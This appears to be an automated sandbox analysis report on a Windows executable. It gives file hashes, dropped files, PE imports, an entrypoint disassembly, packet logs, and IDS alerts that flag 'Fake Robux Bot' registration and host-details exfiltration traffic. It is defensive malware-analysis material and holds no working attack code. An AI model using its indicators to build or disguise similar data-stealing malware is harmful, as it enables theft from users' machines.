                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cumfjpru.mos.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5mssqj2.zeh.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eg5254x2.lrk.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ht2vr5fe.e3t.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrxn2xjl.aof.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouifijdz.qgp.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p12s1lnm.qpo.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnrk4m3e.eir.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zc3p0yzm.b45.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              \Device\ConDrv

                                                              Download File
                                                              Process:C:\Users\user\Desktop\OSLdZanXNc.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):72
                                                              Entropy (8bit):4.644610558622846
                                                              Encrypted:false
                                                              SSDEEP:3:5FqvS0qfFXVbARV6oa:B0sVbz
                                                              MD5:FDF2E994BEA34B6B6F4B94DE701994AB
                                                              SHA1:B6F158090800D5706252CB4010AE55C77EA9CB27
                                                              SHA-256:7D681BAF6C76989E40D7669842EAC13A5A2115FED59D7DE645AEDA202206B5BD
                                                              SHA-512:788A36DCC54BB9AD0D6EE9501EFAC0A7FB65BCDE9060484E454BB98D334FAA5DFB3272FD38E39DC1F43E412FCB1274331CD6219B82214553E384A1BAA7280DE5
                                                              Malicious:false
                                                              Preview:[#] Usage : OSLdZanXNc.exe <Input x64 exe> <*Output*>..[#] Output : ....

                                                              Static File Info

                                                              General

                                                              File type:PE32+ executable (console) x86-64, for MS Windows
                                                              Entropy (8bit):6.115613434611554
                                                              TrID:
                                                              • Win64 Executable Console (202006/5) 92.65%
                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                              • DOS Executable Generic (2002/1) 0.92%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:OSLdZanXNc.exe
                                                              File size:45'568 bytes
                                                              MD5:98ff253f6f854df7b7f6794a2761dbd1
                                                              SHA1:246ae6060c76a6751b6ba2d9ca0de18e298b5e26
                                                              SHA256:a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203
                                                              SHA512:4e8a028a5f8a49e734cdf58f2337a486c7268997296f1048d5481896452524873345b74cb31c9ffd47db1721c6b5c927542e2f979341459f7da6d70ac287972d
                                                              SSDEEP:768:DvoFKVVoTnsXSkAut5oIZ3tHgBqT35QMt4135P:DvoFKYg7TBZBSW5Q04j
                                                              TLSH:1F236BA5BA5100D8C47B4078C92BD2FDB2B2FC95074096EF4301866D3FB37E8A9B6715
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........J..g...g...g.......g..}f...g.K.c...g..}d...g..}c...g..}b...g...f...g...f...g..zo...g..z....g..ze...g.Rich..g................

                                                              File Icon

                                                              Icon Hash:00928e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x140001e80
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x140000000
                                                              Subsystem:windows cui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x66FF04D1 [Thu Oct 3 20:55:45 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:a43d15331c9ee28121574258bd659d78

                                                              Entrypoint Preview

                                                              Instruction
                                                              dec eax
                                                              sub esp, 28h
                                                              call 00007F7900C03BACh
                                                              dec eax
                                                              add esp, 28h
                                                              jmp 00007F7900C03657h
                                                              int3
                                                              int3
                                                              inc eax
                                                              push ebx
                                                              dec eax
                                                              sub esp, 20h
                                                              dec eax
                                                              mov ebx, ecx
                                                              xor ecx, ecx
                                                              call dword ptr [000081F3h]
                                                              dec eax
                                                              mov ecx, ebx
                                                              call dword ptr [000081F2h]
                                                              call dword ptr [000081DCh]
                                                              dec eax
                                                              mov ecx, eax
                                                              mov edx, C0000409h
                                                              dec eax
                                                              add esp, 20h
                                                              pop ebx
                                                              dec eax
                                                              jmp dword ptr [000081C0h]
                                                              dec eax
                                                              mov dword ptr [esp+08h], ecx
                                                              dec eax
                                                              sub esp, 38h
                                                              mov ecx, 00000017h
                                                              call dword ptr [000081A4h]
                                                              test eax, eax
                                                              je 00007F7900C037E9h
                                                              mov ecx, 00000002h
                                                              int 29h
                                                              dec eax
                                                              lea ecx, dword ptr [0000A232h]
                                                              call 00007F7900C0388Eh
                                                              dec eax
                                                              mov eax, dword ptr [esp+38h]
                                                              dec eax
                                                              mov dword ptr [0000A319h], eax
                                                              dec eax
                                                              lea eax, dword ptr [esp+38h]
                                                              dec eax
                                                              add eax, 08h
                                                              dec eax
                                                              mov dword ptr [0000A2A9h], eax
                                                              dec eax
                                                              mov eax, dword ptr [0000A302h]
                                                              dec eax
                                                              mov dword ptr [0000A173h], eax
                                                              dec eax
                                                              mov eax, dword ptr [esp+40h]
                                                              dec eax
                                                              mov dword ptr [0000A277h], eax
                                                              mov dword ptr [0000A14Dh], C0000409h
                                                              mov dword ptr [0000A147h], 00000001h
                                                              mov dword ptr [0000A151h], 00000001h

                                                              Rich Headers

                                                              Programming Language:
                                                              • [IMP] VS2008 SP1 build 30729

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb3fc0xb4.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x1e0.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0xd0000x588.pdata
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xf0000x30.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xa9e00x70.rdata
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa8a00x140.rdata
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0xa0000x230.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x83cc0x84003f035b9a475e7b0bee14924a2ad04868False0.5557824337121212zlib compressed data6.326232743020032IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0xa0000x1c4a0x1e00c7352e598965211983a506bc2a8aa61bFalse0.42109375data4.731554548739669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xc0000xaa80x20085c2aebd011c5c1b37c1009def59c2b6False0.09375data0.5324895658143383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .pdata0xd0000x5880x600a25f8001a8d46e8c51bd3ab1ecc507aeFalse0.4876302083333333data4.11853894347752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .rsrc0xe0000x1e00x200ae95088ed848b39aad014fdd45607fafFalse0.529296875data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xf0000x300x20037d1b57c226da12c9be78a5fe517e953False0.123046875data0.7148111080262498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_MANIFEST0xe0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                              Imports

                                                              DLLImport
                                                              KERNEL32.dllUnmapViewOfFile, CloseHandle, GetFileSize, CreateFileMappingW, MapViewOfFile, ReadFile, CopyFileA, GetLastError, CreateFileA, WinExec, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, GetModuleHandleW
                                                              VCRUNTIME140.dll__current_exception, memmove, memcpy, memset, __current_exception_context, strrchr, __C_specific_handler
                                                              api-ms-win-crt-heap-l1-1-0.dllmalloc, free, realloc, _set_new_mode
                                                              api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __stdio_common_vsprintf, __stdio_common_vfprintf, __acrt_iob_func, __p__commode
                                                              api-ms-win-crt-runtime-l1-1-0.dll_exit, _initialize_onexit_table, _register_onexit_function, _cexit, terminate, exit, _register_thread_local_exe_atexit_callback, _initterm_e, _initterm, __p___argv, _crt_atexit, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _c_exit, _set_app_type, _seh_filter_exe, __p___argc
                                                              api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                              api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                              api-ms-win-crt-string-l1-1-0.dllstrncmp

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-10-15T16:01:20.844371+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.949868162.159.137.232443TCP
                                                              2024-10-15T16:01:34.007990+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.949943162.159.137.232443TCP
                                                              2024-10-15T16:01:42.173236+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.949984162.159.137.232443TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 15, 2024 16:00:59.882503986 CEST4975780192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:00:59.887358904 CEST8049757185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:00:59.887454033 CEST4975780192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:00:59.890140057 CEST4975780192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:00:59.894932985 CEST8049757185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:00.516709089 CEST8049757185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:00.518656015 CEST8049757185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:00.518750906 CEST4975780192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:00.600095987 CEST4975780192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:00.604435921 CEST49763443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:00.604481936 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:00.604547024 CEST49763443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:00.604979038 CEST8049757185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:00.654700041 CEST49763443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:00.654717922 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.310168028 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.310743093 CEST49763443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:01.313968897 CEST49763443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:01.313982964 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.314243078 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.321593046 CEST49763443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:01.363404036 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.546036959 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.546133041 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.546166897 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.546200037 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.546224117 CEST49763443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:01.546231985 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.546246052 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.546256065 CEST49763443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:01.546328068 CEST49763443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:01.546339989 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.546355963 CEST44349763185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:01.546516895 CEST49763443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:01.601566076 CEST49763443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:17.876583099 CEST4985480192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:17.881484032 CEST8049854104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:17.881556034 CEST4985480192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:17.886178970 CEST4985480192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:17.890964985 CEST8049854104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:18.492137909 CEST8049854104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:18.530236006 CEST49856443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:18.530272961 CEST44349856104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:18.530358076 CEST49856443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:18.541100025 CEST4985480192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:18.564755917 CEST49856443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:18.564778090 CEST44349856104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:19.187001944 CEST44349856104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:19.187073946 CEST49856443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:19.189836025 CEST49856443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:19.189841986 CEST44349856104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:19.190085888 CEST44349856104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:19.197185040 CEST49856443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:19.243431091 CEST44349856104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:19.342922926 CEST44349856104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:19.343031883 CEST44349856104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:19.343086004 CEST49856443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:19.366019011 CEST49856443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:19.380590916 CEST4986280192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:19.385601997 CEST8049862185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:19.385685921 CEST4986280192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:19.385906935 CEST4986280192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:19.390773058 CEST8049862185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:19.985280037 CEST49868443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:19.985368967 CEST44349868162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:19.985460997 CEST49868443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:19.985893965 CEST49868443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:19.985913038 CEST44349868162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:19.998683929 CEST8049862185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:19.998852968 CEST4986280192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:19.999705076 CEST49869443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:19.999737978 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:19.999749899 CEST8049862185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:19.999831915 CEST4986280192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:19.999878883 CEST49869443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:20.000082970 CEST49869443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:20.000097036 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.004415989 CEST8049862185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.613519907 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.613802910 CEST49869443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:20.615279913 CEST49869443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:20.615294933 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.615562916 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.616941929 CEST49869443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:20.618758917 CEST44349868162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:20.618838072 CEST49868443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:20.620219946 CEST49868443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:20.620234966 CEST44349868162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:20.620486975 CEST44349868162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:20.621377945 CEST49868443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:20.663410902 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.667406082 CEST44349868162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:20.667479992 CEST49868443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:20.667488098 CEST44349868162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:20.744543076 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.744642019 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.744678020 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.744718075 CEST49869443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:20.744729042 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.744735956 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.744765043 CEST49869443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:20.744772911 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.744832039 CEST49869443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:20.744839907 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.752732038 CEST44349869185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:20.752945900 CEST49869443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:20.765908003 CEST49869443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:20.844393015 CEST44349868162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:20.844455004 CEST44349868162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:20.844505072 CEST49868443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:20.852142096 CEST49868443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:25.930706024 CEST4990180192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:25.935585976 CEST8049901104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:25.935655117 CEST4990180192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:25.937182903 CEST4990180192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:25.942060947 CEST8049901104.20.3.235192.168.2.9
